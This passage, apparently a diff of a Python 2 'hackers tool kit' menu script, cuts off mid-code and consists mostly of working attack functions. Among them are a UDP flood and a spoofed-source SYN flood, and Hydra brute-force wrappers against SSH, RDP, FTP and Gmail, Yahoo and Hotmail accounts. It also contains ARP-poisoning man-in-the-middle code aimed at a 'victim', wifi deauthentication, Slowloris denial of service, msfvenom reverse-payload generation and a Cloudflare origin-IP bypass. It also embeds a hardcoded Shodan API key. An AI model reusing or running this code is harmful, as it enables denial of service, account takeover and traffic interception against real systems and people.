___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -def sysinfo(): - os.system("ifconfig") - os.system("iwconfig") - os.system("neofetch") - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -def tcp(): - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - os.system("python " + tcp) -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() - -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" - -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > handler.rc') - os.system('echo "set delay {0}\n" >> handler.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> handler.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> handler.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> handler.rc'.format(soc)) - os.system('echo "run\n" >> handler.rc') - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') - -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def arppois(): - - try: - os.system("iwconfig") - interface = raw_input("[*] Enter Interface: ") - victimIP = raw_input("[*] Enter Victim IP: ") - gateIP = raw_input("[*] Enter Router IP: ") - except KeyboardInterrupt: - print "\n[*] User Requested Shutdown" - print "[*] Exiting..." - os.system("clear") - mainbanner() - - print "\n[*] Enabling IP Forwarding...\n" - os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") - - def get_mac(IP): - conf.verb = 0 - ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) - for snd,rcv in ans: - return rcv.sprintf(r"%Ether.src%") - - def reARP(): - - print "\n[*] Restoring Targets..." - victimMAC = get_mac(victimIP) - gateMAC = get_mac(gateIP) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) - print "[*] Disabling IP Forwarding..." - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[*] Shutting Down..." - os.system("clear") - mainbanner() - - def trick(gm, vm): - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) - - def mitm(): - try: - victimMAC = get_mac(victimIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Victim MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - try: - gateMAC = get_mac(gateIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Gateway MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - print "[*] Poisoning Targets..." - while 1: - try: - trick(gateMAC, victimMAC) - time.sleep(1.5) - except KeyboardInterrupt: - reARP() - break - mitm() -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and 